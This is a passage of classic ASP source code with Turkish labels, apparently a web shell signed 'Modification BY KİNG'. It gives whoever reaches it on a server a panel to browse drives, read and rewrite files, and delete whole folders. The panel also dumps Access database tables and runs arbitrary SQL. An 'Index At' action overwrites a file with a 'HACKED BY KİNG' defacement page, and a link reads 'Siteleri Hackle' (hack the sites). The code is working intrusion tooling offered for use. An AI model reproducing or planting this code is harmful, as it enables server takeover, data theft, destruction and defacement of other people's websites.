" " & dosyaPath & ""
response.write " " & Path & ""
hataKontrol
Response.redirect ""&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/*.*"
hataKontrol
CASE
102
response.write " " & dosyaPath & ""
response.write " " & Path & ""
hataKontrol
Response.redirect
""&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/*.*"
hataKontrol
CASE 103
set f = objFSO.OpenTextFile(dPath,1)
response.write "" & Path & " <br>"
response.write ""&dPath&""
Response.Write
"<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
Response.Write "<input
type=hidden name=status value='11'>"
Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
Response.Write
"<input type=hidden name=Path value='"&Path &"'>"
Response.Write "<input type=submit value=Kaydet><br>"
Response.Write
"<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow
thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime; border-bottom: lightgoldenrodyellow
thin solid; font-family: Courier New, Arial;background-color: navy;'>"
Response.Write "<html><head><title>..::
HACKED BY KİNG ::..</title></head><body bgcolor=#000000><br><br><br><br><br><br><br><center><font
size=8 color=#ffffff>..::: HACKED BY KİNG :::..</font></center></body></html>"
Response.Write
"</textarea></form></center>"
hataKontrol
CASE 3 'File Delete
objFSO.DeleteFile del
hataKontrol
' Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
CASE
4 'Folder Delete
objFSO.DeleteFolder del
' Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
hataKontrol
CASE
5 'Dosya içeriğini görüntüle
Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
Response.Write
"<table width=100% ><tr><td>"
set f = objFSO.OpenTextFile(path,1)
Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
if
err<>62 then hataKontrol
if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya
Okunamıyor\nSistem dosyası olabilir')</script>":Response.End
CASE 6 'Resim aç
Response.Write "<center><img
ALT='osmanoya@hotmail.com' src='"&resimYol(path)&"'></center><br>"
CASE 7 'database tablo listele
Response.Write "<b><font
size=3>Tablolar</font></br><br>"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX
= Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objADOX.ActiveConnection
= objConn
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<font face=wingdings size=5>4</font>
<a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
End
If
Next
hataKontrol
CASE 8 'database kayıt listele
Set objConn = Server.CreateObject("ADODB.Connection")
Set
objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString
= Path
objConn.Open
objRcs.Open table,objConn, adOpenKeyset , , adCmdText
Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
for
i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b> "&objRcs.Fields(i).Name&" </font></td>"
next
Response.Write
"</tr>"
do while not objRcs.EOF
Response.Write "<tr>"
for i=0 to objRcs.Fields.count-1
Response.Write
"<td>"&objRcs.Fields(i).Value&" </td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write
"</table><br>"
hataKontrol
CASE 9 'SQL Execute
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Provider
= "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objConn.Execute strSQL
' Response.Redirect
dosyaPath&"?status=7&Path="&Path&"&Time="&time
hataKontrol
CASE 10 'Dosya Editleme
set f
= objFSO.OpenTextFile(dPath,1)
Response.Write "<center><form action='"&DosyPath&"?Time="&time&"'
method=post>"
Response.Write "<input type=hidden name=status value='11'>"
Response.Write "<input type=hidden
name=dPath value='"&dPath&"'>"
Response.Write "<input type=hidden name=Path value='"&Path &"'>"
Response.Write
"<input type=submit value=Kaydet><br>"
Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right:
lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow
thin solid;color: lime; border-bottom: lightgoldenrodyellow thin solid; font-family: Courier New, Arial;background-color:
navy;'>"
Response.Write server.HTMLEncode(f.readAll)
Response.Write "</textarea></form></center>"
hataKontrol
CASE
11 'Dosya Kayıt
set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
hataKontrol
saveTextFile.Write(dkayit)
saveTextFile.close
Response.Redirect
dosyaPath&"?status=2&path="&path&"&time="&time
CASE 12 'Dosya Arama
araBul path,arama
hataKontrol
END
SELECT
Response.Write "</tr></table>"
sub DosyaOku
Set f = objFSO.GetFolder(Path)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num
= InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font
face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font
face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"'
onclick=""ffd(this.href);return false;"">4</a></font></font> <a href='"&dosyaPath&"?status=101&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>DEL
All File</a> <a href='"&dosyaPath&"?status=103&dPath="&f1.path&"&path="&path&"&Time="&time&"'>İndex
At</a>"
response.Write "<font size=2>"
select case uzanti
case "mdb"
Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"
[<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings
size=4>M "&downStr&"</font><br>"
case "asp"
Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"
[<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings
size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
case
"jpg","gif"
Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"
[<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings
size=4>¢</font><font face=wingdings size=4> "&downStr&"</font><br>"
case else
Response.Write
"<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"
[<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings
size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
end
select
Next
end sub
sub KlasorOku
Set f = objFSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 In fc
Response.Write "<a
href='"&dosyaPath&"?status=102&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>Del
All Folder</a> <font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"'
onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>
1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
Next
end
sub
function createFileName()
Randomize
fName_ = ""
for i=1 to 10
fName_ = fName_ & int(Rnd*100)
next
createFileName
= fName_
end function
function resimYol(path_)
on error resume next
path_ = Replace(Replace(path_,"\","/"),"//","/")
lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
if
yaziyomu2(lpath_) then
fname__ = "0"&createFileName()&"."&Right(path_,3)
objFSO.CopyFile path_, lpath_&"\"&fname__
else
Response.Write("Resim
Açılamıyor.. <br>İsterseniz Download Ederek görüntüleyebilirsiniz..")
end if
resimYol = fname__
end
function
if not popup then
Set fc = Nothing
Set objFSO = Nothing
Response.End
end if
%>
<script language=javascript>
var dosyaPath = "<%=dosyaPath%>"
// DRIVE ISLEMLERI
function driveGo(drive_){
location
= dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
}
</script>
<%
Response.Write "<table
align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font
color=white>Sürücüler</td></tr>"
for each drive_ in objFSO.Drives
Response.Write "<tr><td>"
Response.write
"<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
if
drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=2 then Response.write
"HardDisk [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter
& ":]"
if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
Response.Write "</a></td></tr>"
next
Response.Write
"<tr><td>"
Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font>
Local Path"
Response.Write "</a></td></tr>"
Response.Write "</table><br>"
Set fc =
Nothing
Set objFSO = Nothing
%>
<% if status = 4 then
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
else
if status = 3 then
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
end if
end
if %>
<center>
<pre>
<a href="<%=dosyaPath%>?status=13" onclick="sistemBilgisi(this.href);return
false;">Sistem Bilgisi</a>
<a href="<%=dosyaPath%>?status=40" onclick="sistemTest(this.href);return false;">Sistemi
Test Et</a>
<a href="<%=dosyaPath%>?status=50">Siteleri Hackle :D</a>
<a href="<%=dosyaPath%>?status=14&path=<%=path%>"
onclick="klasorIslemleri(this.href);return false;">Klasor Islemleri</a>
<a href="<%=dosyaPath%>?status=15"
onclick="sqlServer(this.href);return false;">SQL Server Islemleri</a>
<a href="<%=dosyaPath%>?status=33"
onclick="poweredby(this.href);return false;">Modification BY KİNG</a>
</pre>
<script language=javascript>
function sistemBilgisi(yol){
NewWindow(yol,"",600,240,"no");
}
function
klasorIslemleri(yol){
NewWindow(yol,"",400,280,"no");
}
function sqlServer(yol){
NewWindow(yol,"",300,50,"no");
}
function
poweredby(yol){
NewWindow(yol,"",400,300,"no");
}
function sistemTest(yol){
NewWindow(yol,"",400,300,"no");
}
</script>
<%Response.End%>
